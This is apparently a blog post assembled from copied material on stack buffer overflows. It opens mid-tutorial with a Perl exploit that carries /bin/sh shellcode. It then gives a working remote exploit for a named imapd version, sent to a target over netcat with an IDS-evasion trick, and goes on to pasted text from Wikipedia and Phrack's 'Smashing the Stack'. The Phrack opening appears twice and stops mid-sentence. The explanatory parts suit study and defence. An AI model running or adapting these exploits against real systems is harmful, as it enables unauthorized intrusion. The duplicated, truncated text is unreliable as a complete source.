/ ESP + offset / NOP's / Shellcode
Payload: [ RRRRRRRRRRRRRRRNNNNNNNNNNNNNNNNNNSSSSSS ]
| | ----------> #
----------


(Note: The buffer cannot contain any NULL bytes!)

-----------------------------------------------------------------------------

Explained Example Exploit:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/perl


$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";


$len = 1024 + 8; # The length needed to own EIP.
$ret = 0xbffff770; # The stack pointer at crash time.
$nop = "\x90"; # x86 NOP
$offset = -1000; # Default offset to try.


if (@ARGV == 1) {
$offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

# [ Buffer: NNNNNNNNNNNNNN ]

# Add a lot of x86 NOP's to the buffer scalar. (885 NOP's)

$buffer .= $shellcode;

# [ Buffer: NNNNNNNNNNNNNNSSSSS ]

# Then we add the shellcode to the buffer. We made room for the shellcode
# above.

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

# Here we add the offset to the stack pointer value - convert it to hex,
# and then print it out.

$new_ret = pack('l', ($ret + $offset));

# pack is a function which will take a list of values and pack it into a
# binary structure, and then return that string containing the structure.
# So, pack the stack pointer / ESP + offset into a signed long - (4 bytes).

for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}

# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]

# Here we add the length of the shellcode to the scalar $i, which after the
# first for loop had finished held the value "885" (bytes), then the for loop
# adds the $new_ret scalar until $buffer has the size of 1032 bytes.
#
# Could also have been written as this:
#
# until (length($buffer) == $len) {
# $buffer .= $new_ret;
#}

local($ENV{'KIDVULN'}) = $buffer; exec("/bin/vuln");

# Copy it into the shell variable KIDVULN, and execute vuln.

-----------------------------------------------------------------------------

#!/usr/bin/perl

## *** Successfully tested on IMAP4rev1 v10.190
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - written just for fun.
## Vulnerable: imapd versions 9.0 > 10.223 / CA.

# Shellcode stolen from imapx.c / The Tekneeq Crew

$shellcode ="\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
"\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
"\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
"\x2f\x32\x39\x3e\x2f\x43\x38";

$len = 1052; # Sufficient to overwrite the return value.
$nop = A; # Using A (0x41) 'as' NOP's to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.

if (@ARGV < 2) {
print("Usage: $0 \n");
exit(1);
}

($target, $offset) = @ARGV;

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));

$address = sprintf('%lx', ($ret + $offset));
print("Address: 0x$address / Offset: $offset / Length: $len\n\n");
sleep(1);

for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}

$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";

system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");

-----------------------------------------------------------------------------

Links & Resources:
~~~~~~~~~~~~~~~~~~~~

Smashing The Stack For Fun And Profit by Aleph One
http://phrack.infonexus.com/search.phtml?view&article=p49-14

Writing buffer overflow exploits - a tutorial for beginners.
http://mixter.warrior2k.com/exploit.txt / Written by Mixter.

TESO Security Group / http://teso.scene.at/




Buffer overflow
From Wikipedia, the free encyclopedia
Jump to: navigation, search

In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a breach of system security.

A buffer overflow is an anomalous condition where a process attempts to store data beyond the boundaries of a fixed length buffer. The result is that the extra data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow data.

Buffer overflows may cause a process to crash or produce incorrect results. They can be triggered by inputs specifically designed to execute malicious code or to make the program operate in an unintended way. As such, buffer overflows cause many software vulnerabilities and form the basis of many exploits. Sufficient bounds checking by either the programmer or the compiler can prevent buffer overflows.
Contents
[hide]

* 1 Technical description
o 1.1 Basic example
o 1.2 Buffer overflows on the stack
o 1.3 Example source code
* 2 Exploitation
o 2.1 Stack-based exploitation
o 2.2 Heap-based exploitation
o 2.3 Barriers to exploitation
* 3 Protection against buffer overflows
o 3.1 Choice of programming language
o 3.2 Use of safe libraries
o 3.3 Stack-smashing protection
o 3.4 Executable space protection
o 3.5 Address space layout randomization
o 3.6 Deep packet inspection
* 4 History of exploitation
* 5 See also
* 6 Notes
* 7 External links

[edit]

Technical description

A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts data values in memory addresses adjacent to the allocated buffer. Most commonly this occurs when copying strings of characters from one buffer to another.
[edit]

Basic example

In the following example, a program has defined two data items which are adjacent in memory: an 8-byte-long string buffer, A, and a two-byte integer, B. Initially, A contains nothing but zero bytes, and B contains the number 3. Characters are one byte wide.
A A A A A A A A B B
0 0 0 0 0 0 0 0 0 3

Now, the program attempts to store the character string "excessive" in the A buffer, followed by a zero byte to mark the end of the string. By not checking the length of the string, it overwrites the value of B:
A A A A A A A A B B
'e' 'x' 'c' 'e' 's' 's' 'i' 'v' 'e' 0

Although the programmer did not intend to change B at all, B's value has now been replaced by a number formed from part of the character string. In this example, on a big-endian system that uses ASCII, "e" followed by a zero byte would become the number 25856.

If B was the only other variable data item defined by the program, writing an even longer string that went past the end of B could cause an error such as a segmentation fault, terminating the process.
[edit]

Buffer overflows on the stack

Besides changing values of unrelated variables, buffer overflows can often be used (exploited) by attackers to cause a running program to execute arbitrary supplied code. The techniques available to an attacker to seek control over a process depend on the memory region where the buffer resides. For example the stack memory region, where data can be temporarily "pushed" onto the "top" of the stack, and later "popped" to read the value of the variable. Typically, when a function begins executing, temporary data items (local variables) are pushed, which remain accessible only during the execution of that function. Not only are there stack overflows, but also heap overflows.

In the following example, "X" is data that was on the stack when the program began executing; the program then called a function "Y", which required a small amount of storage of its own; and "Y" then called "Z", which required a large buffer:
Z Z Z Z Z Z Y X X X
: / / /

If the function Z caused a buffer overflow, it could overwrite data that belonged to function Y or to the main program:
Z Z Z Z Z Z Y X X X
. . . . . . . . / /

This is particularly serious because on most systems, the stack also holds the return address, that is, the location of the part of the program that was executing before the current function was called. When the function ends, the temporary storage is removed from the stack, and execution is transferred back to the return address. If, however, the return address has been overwritten by a buffer overflow, it will now point to some other location. In the case of an accidental buffer overflow as in the first example, this will almost certainly be an invalid location, not containing any program instructions, and the process will crash. However, a malicious attacker could tailor the return address to point to an arbitrary location such that it could compromise system security.
[edit]

Example source code

The following is C source code exhibiting a common programming mistake. Once compiled, the program will generate a buffer overflow error if run with a command-line argument string that is too long, because this argument is used to fill a buffer without checking its length. [1]

/* overflow.c - demonstrates a buffer overflow */

#include
#include

int main(int argc, char *argv[])
{
char buffer[10];
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strcpy(buffer, argv[1]);
return 0;
}

Strings of 9 or fewer characters will not cause a buffer overflow. Strings of 10 or more characters will cause an overflow: this is always incorrect but may not always result in a program error or segmentation fault.

This program could be safely rewritten using strncpy as follows: [1]

/* better.c - demonstrates one method of fixing the problem */

#include
#include

int main(int argc, char *argv[])
{
char buffer[10];
if (argc < 2)
{
fprintf(stderr, "USAGE: %s string\n", argv[0]);
return 1;
}
strncpy(buffer, argv[1], sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
return 0;
}

[edit]

Exploitation

The techniques to exploit a buffer overflow vulnerability vary per architecture, operating system and memory region. For example, exploitation on the heap (used for dynamically allocated variables) is very different from stack-based variables.
[edit]

Stack-based exploitation

A technically inclined and malicious user may exploit stack-based buffer overflows to manipulate the program in one of several ways:

* By overwriting a local variable that is near the buffer in memory on the stack to change the behaviour of the program which may benefit the attacker.
* By overwriting the return address in a stack frame. Once the function returns, execution will resume at the return address as specified by the attacker, usually a user input filled buffer.

If the address of the user-supplied data is unknown, but the location is stored in a register, then the return address can be overwritten with the address of an opcode which will cause execution to jump to the user supplied data. If the location is stored in a register R, then a jump to the location containing the opcode for a jump R, call R or similar instruction, will cause execution of user supplied data. The locations of suitable opcodes, or bytes in memory, can be found in DLLs or the executable itself. However the address of the opcode typically cannot contain any null characters and the locations of these opcodes can vary in their location between applications and versions of the operating system. The Metasploit Project is one such database of suitable opcodes, though only those found in the Windows operating system are listed. [2]
[edit]

Heap-based exploitation

Main article: Heap overflow

A buffer overflow occurring in the heap data area is referred to as a heap overflow and is exploitable in a different manner to that of stack-based overflows. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data. Exploitation is performed by corrupting this data in specific ways to cause the application to overwrite internal structures such as linked list pointers. The canonical heap overflow technique overwrites dynamic memory allocation linkage (such as malloc meta data) and uses the resulting pointer exchange to overwrite a program function pointer.

The Microsoft JPEG GDI+ vulnerability is a recent example of the danger a heap overflow can represent to a computer user. [3]
[edit]

Barriers to exploitation

Manipulation of the buffer which occurs before it is read or executed may lead to the failure of an exploitation attempt. These manipulations can mitigate the threat of exploitation, but may not make it impossible. Manipulations could include conversion to upper or lower case, removal of metacharacters and filtering out of non-alphanumeric strings. However techniques exist to bypass these filters and manipulations; alphanumeric code, polymorphic code, Self-modifying code and return to lib-C attacks. The same methods can be used to avoid detection by Intrusion detection systems. In some cases, including where code is converted into unicode, the threat of the vulnerability have been limited to Denial of Service by the disclosers when infact the remote execution of arbitrary code is possible.
[edit]

Protection against buffer overflows

Various techniques have been used to detect or prevent buffer overflows, with various tradeoffs. The most reliable way to avoid or prevent buffer overflows is to use automatic protection at the language level. This sort of protection, however, cannot be applied to legacy code, and often technical, business, or cultural constraints call for a vulnerable language. The following sections describe the choices and implementations available.
[edit]

Choice of programming language

The choice of programming language can have a profound effect on the occurrence of buffer overflows. As of 2006, among the most popular languages are C and its derivative, C++, with an enormous body of software having been written in these languages. C and C++ provide no built-in protection against accessing or overwriting data in any part of memory through invalid pointers; more specifically, they do not check that data written to an array (the implementation of a buffer) is within the boundaries of that array. However, it is worth noting that the standard C++ libraries, the STL, provide many ways of safely buffering data, and similar facilities can also be created and used by C programmers. As with any other C or C++ feature, individual programmers are given the choice as to whether or not they wish to accept performance penalties in order to reap the potential benefits.

Variations on C such as Cyclone help to prevent more buffer overflows by, for example, attaching size information to arrays. The D programming language uses a variety of techniques to avoid most uses of pointers and user-specified bounds checking.

Many other programming languages provide runtime checking which might send a warning or raise an exception when C or C++ would overwrite data. Examples of such languages range broadly from Python to Ada, from Lisp to Modula-2, and from Smalltalk to OCaml. The Java and .NET bytecode environments also require bounds checking on all arrays. Nearly every interpreted language will protect against buffer overflows, signalling a well-defined error condition. Often where a language provides enough type information to do bounds checking an option is provided to enable or disable it. Static code analysis can remove many dynamic bound and type checks, but poor implementations and awkward cases can significantly decrease performance. Software engineers must carefully consider the tradeoffs of safety versus performance costs when deciding which language and compiler setting to use.
[edit]

Use of safe libraries

The problem of buffer overflows is common in the C and C++ languages because they expose low level representational details of buffers as containers for data types. Buffer overflows must thus be avoided by maintaining a high degree of correctness in code which performs buffer management. Well-written and tested abstract data type libraries which centralize and automatically perform buffer management, including bounds checking, can reduce the occurrence and impact of buffer overflows. The two main building-block data types in these languages in which buffer overflows commonly occur are strings and arrays; thus, libraries preventing buffer overflows in these data types can provide the vast majority of the necessary coverage. Still, failure to use these safe libraries correctly can result in buffer overflows and other vulnerabilities; and naturally, any bug in the library itself is a potential vulnerability. "Safe" library implementations include The Better String Library, Arri Buffer API, Vstr, and Erwin. The OpenBSD operating system's C library provides the helpful strlcpy and strlcat functions, but these are much more limited than full safe library implementations.

In September 2006, Technical Report 24731, prepared by the C standards committee, was published; it specifies a set of functions which are based on the standard C library's string and I/O functions, with additional buffer-size parameters.
[edit]

Stack-smashing protection

Main article: Stack-smashing protection

Stack-smashing protection is used to detect the most common buffer overflows by checking that the stack has not been altered when a function returns. If it has been altered, the program exits with a segmentation fault. Three such systems are Libsafe,[4] and the StackGuard [5] and ProPolice[6] gcc patches.

Microsoft's Data Execution Prevention mode explicitly protects the pointer to the SEH Exception Handler from being overwritten. [7]

Stronger stack protection is possible by splitting the stack in two: one for data and one for function returns. This split is present in the Forth programming language, though it was not a security-based design decision. Regardless, this is not a complete solution to buffer overflows, as sensitive data other than the return address may still be overwritten.
[edit]

Executable space protection

Main article: Executable space protection

Executable space protection is an approach to buffer overflow protection which prevents execution of code on the stack or the heap. An attacker may use buffer overflows to insert arbitrary code into the memory of a program, but with executable space protection, any attempt to execute that code will cause an exception.

Some CPUs support a feature called NX ("No eXecute") or XD ("eXecute Disabled") bit, which in conjunction with software, can be used to mark pages of data (such as those containing the stack and the heap) as readable but not executable.

Some Unix operating systems (e.g. OpenBSD, Mac OS X) ship with executable space protection (e.g. W^X). Some optional packages include:

* PaX [8]
* Exec Shield[9]
* Openwall

Newer variants of Microsoft Windows also support executable space protection, called Data Execution Prevention[10] . Add-ons include:

* SecureStack
* OverflowGuard
* BufferShield[11]
* StackDefender

Executable space protection does not protect against return-to-libc attacks.
[edit]

Address space layout randomization

Main article: Address space layout randomization

Address space layout randomization (ASLR) is a computer security feature which involves arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, randomly in a process' address space.

Randomization of the virtual memory addresses at which functions and variables can be found can make exploitation of a buffer overflow more difficult, but not impossible. It also forces the attacker to tailor the exploitation attempt to the individual system, which foils the attempts of internet worms.[12] A similar but less effective method is to rebase processes and libraries in the virtual address space.
[edit]

Deep packet inspection

Main article: Deep packet inspection

The use of deep packet inspection (DPI) can detect, at the network perimeter, remote attempts to exploit buffer overflows by use of attack signatures and heuristics. These are able to block packets which have the signature of a known attack, or if a long series of No-Operation (NOP) instructions (known as a nop-sled) is detected, these are often used when the location of the exploit's payload is slightly variable.

Packet scanning is not an effective method since it can only prevent known attacks and there are many ways that a 'nop-sled' can be encoded. Attackers have begun to use alphanumeric, metamorphic, and self-modifying shellcodes to avoid detection by heuristic packet scans also.
[edit]

History of exploitation

The earliest known exploitation of a buffer overflow was in 1988. It was one of several exploits used by the Morris worm to propagate itself over the Internet. The program exploited was a Unix service called fingerd.[13]

Later, in 1995, Thomas Lopatic independently rediscovered the buffer overflow and published his findings on the Bugtraq security mailing list. [14] A year later, in 1996, Elias Levy (aka Aleph One) published in Phrack magazine the paper "Smashing the Stack for Fun and Profit", [15] a step-by-step introduction to exploiting stack-based buffer overflow vulnerabilities.

Since then at least two major internet worms have exploited buffer overflows to compromise a large number of systems. In 2001, the Code Red worm exploited a buffer overflow in Microsoft's Internet Information Services (IIS) 5.0 [16] and in 2003 the SQLSlammer worm compromised machines running Microsoft SQL Server 2000. [17]
[edit]

See also

* Computer security
* Computer insecurity
* Security focused operating systems
* Static code analysis
* Heap overflow
* Return-to-libc attack
* Self-modifying code
* Shellcode

[edit]

Notes

1. ^ a b Safer C: Developing Software for High-integrity and Safety-critical Systems (ISBN 0-07-707640-0)
2. ^ The Metasploit Opcode Database [1]
3. ^ Microsoft Technet Security Bulletin MS04-028 [2]
4. ^ Libsafe at FSF.org [3]
5. ^ (PDF) StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks by Cowan et al.
6. ^ ProPolice at X.ORG [4]
7. ^ Bypassing Windows Hardware-enforced Data Execution Prevention[5]
8. ^ PaX: Homepage of the PaX team[6]
9. ^ KernelTrap.Org [7]
10. ^ Microsft Technet: Data Execution Prevention [8]
11. ^ BufferShield: Prevention of Buffer Overflow Exploitation for Windows[9]
12. ^ PaX at GRSecurity.net [10]
13. ^ "A Tour of The Worm" by Donn Seeley, University of Utah [11]
14. ^ Bugtraq security mailing list [12]
15. ^ "Smashing the Stack for Fun and Profit" by Aleph One [13]
16. ^ eEye Digital Security [14]
17. ^ Microsft Technet Security Bulletin MS02-039 [15]

[edit]

External links

* CERT Secure Coding Standards
* CERT Secure Coding Initiative
* Secure Coding in C and C++
* SANS: inside the buffer overflow attack
* More Security Whitepapers about Buffer Overflows
* (PDF) Chapter 12: Writing Exploits III from Sockets, Shellcode, Porting & Coding: Reverse Engineering Exploits and Tool Coding for Security Professionals by James C. Foster (ISBN 1-59749-005-9). Detailed explanation of how to use Metasploit to develop a buffer overflow exploit from scratch.



------------------------



.oO Phrack 49 Oo.

Volume Seven, Issue Forty-Nine

File 14 of 16

BugTraq, r00t, and Underground.Org
bring you

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

by Aleph One
ale...@underground.org

`smash the stack` [C programming] n. On many C implementations
it is possible to corrupt the execution stack by writing past
the end of an array declared auto in a routine. Code that does
this is said to smash the stack, and can cause return from the
routine to jump to a random address. This can produce some of
the most insidious data-dependent bugs known to mankind.
Variants include trash the stack, scribble the stack, mangle
the stack; the term mung the stack is not used, as this is
never done intentionally. See spam; see also alias bug,
fandango on core, memory leak, precedence lossage, overrun screw.

Introduction
~~~~~~~~~~~~

Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited. Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt
library, at, etc. This paper attempts to explain what buffer overflows
are, and how their exploits work.

Basic knowledge of assembly is required. An understanding of virtual
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating
system is Linux.

Some basic definitions before we begin: A buffer is simply a contiguous
block of computer memory that holds multiple instances of the same data
type. C programmers normally associate with the word buffer arrays. Most
commonly, character arrays. Arrays, like all variables in C, can be
declared either static or dynamic. Static variables are allocated at load
time on the data segment. Dynamic variables are allocated at run time on
the stack. To overflow is to flow, or fill over the top, brims, or bounds.
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.

Process Memory Organization
~~~~~~~~~~~~~~~~~~~~~~~~~~~

To understand what stack buffers are we must first understand how a
process is organized in memory. Processes are divided into three regions:
Text, Data, and Stack. We will concentrate on the stack region, but first
a small overview of the other regions is in order.

The text region is fixed by the program and includes code (instructions)
and read-only data. This region corresponds to the text section of the
executable file. This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.

The data region contains initialized and uninitialized data. Static
variables are stored in this region. The data region corresponds to the
data-bss sections of the executable file. Its size can be changed with the
brk(2) system call. If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.

/------------------\ lower
| | memory
| Text | addresses
| |
|------------------|
| (Initialized) |
| Data |
| (Uninitialized) |
|------------------|
| |
| Stack | higher
| | memory
\------------------/ addresses

Fig. 1 Process Memory Regions

What Is A Stack?
~~~~~~~~~~~~~~~~

A stack is an abstract data type frequently used in computer science. A
stack of objects has the property that the last object placed on the stack
will be the first object removed. This property is commonly referred to as
last in, first out queue, or a LIFO.

Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in
contrast, reduces the stack size by one by removing the last element at the
top of the stack.

Why Do We Use A Stack?
~~~~~~~~~~~~~~~~~~~~~~

Modern computers are designed with the need of high-level languages in
mind. The most important technique for structuring programs introduced by
high-level languages is the procedure or function. From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the
statement or instruction following the call. This high-level abstraction
is implemented with the help of the stack.

The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.

The Stack Region
~~~~~~~~~~~~~~~~

A stack is a contiguous block of memory containing data. A register called
the stack pointer (SP) points to the top of the stack. The bottom of the
stack is at a fixed address. Its size is dynamically adjusted by the kernel
at run time. The CPU implements instructions to PUSH onto and POP off of the
stack.

The stack consists of logical stack frames that are pushed when calling a
function and popped when returning. A stack frame contains the parameters to
a function, its local variables, and the data necessary to recover the
previous stack frame, including the value of the instruction pointer at the
time of the function call.

Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up. In our examples we'll use a stack that grows
down. This is the way the stack grows on many computers including the Intel,
Motorola, SPARC and MIPS processors. The stack pointer (SP) is also
implementation dependent. It may point to the last address on the stack, or
to the next free available address after the stack. For our discussion we'll
assume it points to the last address on the stack.

In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame. Some texts also refer
to it as a local base pointer (LB). In principle, local variables could be
referenced by giving their offsets from SP. However, as words are pushed onto
the stack and popped from the stack, these offsets change. Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required. Futhermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.

Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this
purpose. On the Motorola CPUs, any address register except A7 (the stack
pointer) will do. Because the way our stack grows, actual parameters have
positive offsets and local variables have negative offsets from FP.

The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit). Then it copies SP into FP to
create the new FP, and advances SP to reserve space for the local variables.
This code is called the procedure prolog. Upon procedure exit, the stack
must be cleaned up again, something called the procedure epilog. The Intel
ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions,
have been provided to do most of the procedure prolog and epilog work
efficiently.

Let us see what the stack looks like in a simple example:

example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];

}

void main() {
function(1,2,3);
}

------------------------------------------------------------------------------

To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:

$ gcc -S -o example1.s example1.c

By looking at the assembly language output we see that the call to
function() is translated to:

pushl $3
pushl $2
pushl $1
call function

This pushes the 3 arguments to function backwards into the stack, and
calls function(). The instruction 'call' will push the instruction pointer
(IP) onto the stack. We'll call the saved IP the return address (RET). The
first thing done in function is the procedure prolog:

pushl %ebp
movl %esp,%ebp
subl $20,%esp

This pushes EBP, the frame pointer, onto the stack. It then copies the
current SP onto EBP, making it the new FP pointer. We'll call the saved FP
pointer SFP. It then



.oO Phrack 49 Oo.

Volume Seven, Issue Forty-Nine

File 14 of 16

BugTraq, r00t, and Underground.Org
bring you

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

by Aleph One
ale...@underground.org

`smash the stack` [C programming] n. On many C implementations
it is possible to corrupt the execution stack by writing past
the end of an array declared auto in a routine. Code that does
this is said to smash the stack, and can cause return from the
routine to jump to a random address. This can produce some of
the most insidious data-dependent bugs known to mankind.
Variants include trash the stack, scribble the stack, mangle
the stack; the term mung the stack is not used, as this is
never done intentionally. See spam; see also alias bug,
fandango on core, memory leak, precedence lossage, overrun screw.

Introduction
~~~~~~~~~~~~

Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited. Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt
library, at, etc. This paper attempts to explain what buffer overflows
are, and how their exploits work.

Basic knowledge of assembly is required. An understanding of virtual
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating
system is Linux.

Some basic definitions before we begin: A buffer is simply a contiguous
block of computer memory that holds multiple instances of the same data
type. C programmers normally associate with the word buffer arrays. Most
commonly, character arrays. Arrays, like all variables in C, can be
declared either static or dynamic. Static variables are allocated at load
time on the data segment. Dynamic variables are allocated at run time on
the stack. To overflow is to flow, or fill over the top, brims, or bounds.
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.

Process Memory Organization
~~~~~~~~~~~~~~~~~~~~~~~~~~~

To understand what stack buffers are we must first understand how a
process is organized in memory. Processes are divided into three regions:
Text, Data, and Stack. We will concentrate on the stack region, but first
a small overview of the other regions is in order.

The text region is fixed by the program and includes code (instructions)
and read-only data. This region corresponds to the text section of the
executable file. This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.

The data region contains initialized and uninitialized data. Static
variables are stored in this region. The data region corresponds to the
data-bss sections of the executable file. Its size can be changed with the
brk(2) system call. If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.

/------------------\ lower
| | memory
| Text | addresses
| |
|------------------|
| (Initialized) |
| Data |
| (Uninitialized) |
|------------------|
| |
| Stack | higher
| | memory
\------------------/ addresses

Fig. 1 Process Memory Regions

What Is A Stack?
~~~~~~~~~~~~~~~~

A stack is an abstract data type frequently used in computer science. A
stack of objects has the property that the last object placed on the stack
will be the first object removed. This property is commonly referred to as
last in, first out queue, or a LIFO.

Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in
contrast, reduces the stack size by one by removing the last element at the
top of the stack.

Why Do We Use A Stack?
~~~~~~~~~~~~~~~~~~~~~~

Modern computers are designed with the need of high-level languages in
mind. The most important technique for structuring programs introduced by
high-level languages is the procedure or function. From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the
statement or instruction following the call. This high-level abstraction
is implemented with the help of the stack.

The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.

The Stack Region
~~~~~~~~~~~~~~~~

A stack is a contiguous block of memory containing data. A register called
the stack pointer (SP) points to the top of the stack. The bottom of the
stack is at a fixed address. Its size is dynamically adjusted by the kernel
at run time. The CPU implements instructions to PUSH onto and POP off of the
stack.

The stack consists of logical stack frames that are pushed when calling a
function and popped when returning. A stack frame contains the parameters to
a function, its local variables, and the data necessary to recover the
previous stack frame, including the value of the instruction pointer at the
time of the function call.

Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up. In our examples we'll use a stack that grows
down. This is the way the stack grows on many computers including the Intel,
Motorola, SPARC and MIPS processors. The stack pointer (SP) is also
implementation dependent. It may point to the last address on the stack, or
to the next free available address after the stack. For our discussion we'll
assume it points to the last address on the stack.

In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame. Some texts also refer
to it as a local base pointer (LB). In principle, local variables could be
referenced by giving their offsets from SP. However, as words are pushed onto
the stack and popped from the stack, these offsets change. Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required. Futhermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.

Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this
purpose. On the Motorola CPUs, any address register except A7 (the stack
pointer) will do. Because the way our stack grows, actual parameters have
positive offsets and local variables have negative offsets from FP.

The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit). Then it copies SP into FP to
create the new FP, and advances SP to reserve space for the local variables.
This code is called the procedure prolog. Upon procedure exit, the stack
must be cleaned up again, something called the procedure epilog. The Intel
ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions,
have been provided to do most of the procedure prolog and epilog work
efficiently.

Let us see what the stack looks like in a simple example:

example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];

}

void main() {
function(1,2,3);
}

------------------------------------------------------------------------------

To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:

$ gcc -S -o example1.s example1.c

By looking at the assembly language output we see that the call to
function() is translated to:

pushl $3
pushl $2
pushl $1
call function

This pushes the 3 arguments to function backwards into the stack, and
calls function(). The instruction 'call' will push the instruction pointer
(IP) onto the stack. We'll call the saved IP the return address (RET). The
first thing done in function is the procedure prolog:

pushl %ebp
movl %esp,%ebp
subl $20,%esp

This pushes EBP, the frame pointer, onto the stack. It then copies the
current SP onto EBP, making it the new FP pointer. We'll call the saved FP
pointer SFP. It then

0 Comments:

Post a Comment

<< Home